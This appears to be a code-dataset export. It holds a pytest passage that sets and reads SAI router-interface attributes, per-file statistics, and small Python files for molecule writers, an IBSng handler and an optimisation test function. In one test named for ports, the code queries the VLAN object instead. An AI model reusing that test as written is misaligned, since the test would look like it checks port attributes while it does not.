("SAI_ROUTER_INTERFACE_ATTR_IS_VIRTUAL", "true"),
("SAI_ROUTER_INTERFACE_ATTR_IS_VIRTUAL", "false"),
("SAI_ROUTER_INTERFACE_ATTR_NAT_ZONE_ID", "2"),
("SAI_ROUTER_INTERFACE_ATTR_DISABLE_DECREMENT_TTL", "true"),
("SAI_ROUTER_INTERFACE_ATTR_DISABLE_DECREMENT_TTL", "false"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_MPLS_STATE", "true"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_MPLS_STATE", "false")
]
@pytest.mark.parametrize(
"attr,attr_value",
valued_attr
)
def test_set_attr_port(npu, dataplane, sai_rif_obj_port, attr, attr_value):
status = npu.set(sai_rif_obj_port, [attr, attr_value], False)
npu.assert_status_success(status)
if status == "SAI_STATUS_SUCCESS":
rif_attrs_updated[attr] = attr_value
@pytest.mark.parametrize(
"attr,attr_value",
valued_attr
)
def test_set_attr_vlan(npu, dataplane, sai_rif_obj_vlan, attr, attr_value):
status = npu.set(sai_rif_obj_vlan, [attr, attr_value], False)
npu.assert_status_success(status)
if status == "SAI_STATUS_SUCCESS":
rif_attrs_updated[attr] = attr_value
rif_attrs = [
("SAI_ROUTER_INTERFACE_ATTR_SRC_MAC_ADDRESS", "sai_mac_t"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V4_STATE", "bool"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_V6_STATE", "bool"),
("SAI_ROUTER_INTERFACE_ATTR_MTU", "sai_uint32_t"),
("SAI_ROUTER_INTERFACE_ATTR_INGRESS_ACL", "sai_object_id_t"),
("SAI_ROUTER_INTERFACE_ATTR_EGRESS_ACL", "sai_object_id_t"),
("SAI_ROUTER_INTERFACE_ATTR_NEIGHBOR_MISS_PACKET_ACTION", "sai_packet_action_t"),
("SAI_ROUTER_INTERFACE_ATTR_V4_MCAST_ENABLE", "bool"),
("SAI_ROUTER_INTERFACE_ATTR_V6_MCAST_ENABLE", "bool"),
("SAI_ROUTER_INTERFACE_ATTR_LOOPBACK_PACKET_ACTION", "sai_packet_action_t"),
("SAI_ROUTER_INTERFACE_ATTR_IS_VIRTUAL", "bool"), # !
("SAI_ROUTER_INTERFACE_ATTR_NAT_ZONE_ID", "sai_uint8_t"),
("SAI_ROUTER_INTERFACE_ATTR_DISABLE_DECREMENT_TTL", "bool"),
("SAI_ROUTER_INTERFACE_ATTR_ADMIN_MPLS_STATE", "bool"),
]
@pytest.mark.parametrize(
"attr,attr_type",
rif_attrs
)
def test_get_after_set_attr_port(npu, dataplane, sai_rif_obj_port, attr, attr_type):
status, data = npu.get_by_type(sai_rif_obj_vlan, attr, attr_type, do_assert=False)
npu.assert_status_success(status)
@pytest.mark.parametrize(
"attr,attr_type",
rif_attrs
)
def test_get_after_set_attr_vlan(npu, dataplane, sai_rif_obj_vlan, attr, attr_type):
status, data = npu.get_by_type(sai_rif_obj_vlan, attr, attr_type, do_assert=False)
npu.assert_status_success(status)
| 51.452514
| 102
| 0.661021
| 1,124
| 9,210
| 4.77669
| 0.08363
| 0.234681
| 0.274912
| 0.315515
| 0.9607
| 0.957534
| 0.924381
| 0.807227
| 0.793816
| 0.763271
| 0
| 0.007866
| 0.240825
| 9,210
| 178
| 103
| 51.741573
| 0.760011
| 0.000109
| 0
| 0.49359
| 0
| 0
| 0.467579
| 0.403932
| 0
| 0
| 0.001303
| 0
| 0.064103
| 1
| 0.051282
| false
| 0
| 0.012821
| 0
| 0.064103
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
35700b46b88d8b49162af752ad9890914f2d829b
| 131
|
py
|
Python
|
src/stk/molecular/molecules/molecule/utilities/writers/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | null | null | null |
src/stk/molecular/molecules/molecule/utilities/writers/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | null | null | null |
src/stk/molecular/molecules/molecule/utilities/writers/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | null | null | null |
from .mdl_mol import _write_mdl_mol_file # noqa
from .pdb import _write_pdb_file # noqa
from .xyz import _write_xyz_file # noqa
| 32.75
| 48
| 0.793893
| 23
| 131
| 4.043478
| 0.391304
| 0.354839
| 0.258065
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.160305
| 131
| 3
| 49
| 43.666667
| 0.845455
| 0.10687
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ea634b726e145e21299e415f13e961e333e091a5
| 166
|
py
|
Python
|
ibsng/handler/bw/get_all_leaf_names.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 6
|
2018-03-06T10:16:36.000Z
|
2021-12-05T12:43:10.000Z
|
ibsng/handler/bw/get_all_leaf_names.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 3
|
2018-03-06T10:27:08.000Z
|
2022-01-02T15:21:27.000Z
|
ibsng/handler/bw/get_all_leaf_names.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 3
|
2018-01-06T16:28:31.000Z
|
2018-09-17T19:47:19.000Z
|
"""Get all leaf names API method."""
from ibsng.handler.handler import Handler
class getAllLeafNames(Handler):
"""Get all leaf names method class."""
pass
| 18.444444
| 42
| 0.704819
| 22
| 166
| 5.318182
| 0.590909
| 0.102564
| 0.17094
| 0.25641
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180723
| 166
| 8
| 43
| 20.75
| 0.860294
| 0.379518
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ea7d333b5381dd5ca3f8597d8f691154c06531f0
| 264
|
py
|
Python
|
Optimization/LineSearch_DirectionSearch/InputFunction.py
|
JKP0/PG_Academic_Projects
|
6ea5ead027718597b2a3068344c285ef4da8c58f
|
[
"MIT"
] | null | null | null |
Optimization/LineSearch_DirectionSearch/InputFunction.py
|
JKP0/PG_Academic_Projects
|
6ea5ead027718597b2a3068344c285ef4da8c58f
|
[
"MIT"
] | null | null | null |
Optimization/LineSearch_DirectionSearch/InputFunction.py
|
JKP0/PG_Academic_Projects
|
6ea5ead027718597b2a3068344c285ef4da8c58f
|
[
"MIT"
] | null | null | null |
import numpy as np
def func(V):
return (((V[0])**2-V[1])**2+(1-V[0])**2)
def gradf(V):
return (np.array([4*(V[0]**3)-4*V[0]*V[1]+2*V[0]-2, -2*(V[0]**2)+2*V[1]]))
def hesf(V):
return (np.array([[12*(V[0]**2)-4*V[1]+2, -4*V[0]], [-4*V[0], 2]]))
| 29.333333
| 79
| 0.44697
| 65
| 264
| 1.815385
| 0.261538
| 0.152542
| 0.152542
| 0.237288
| 0.084746
| 0.084746
| 0
| 0
| 0
| 0
| 0
| 0.147982
| 0.155303
| 264
| 8
| 80
| 33
| 0.381166
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0.142857
| 0.428571
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.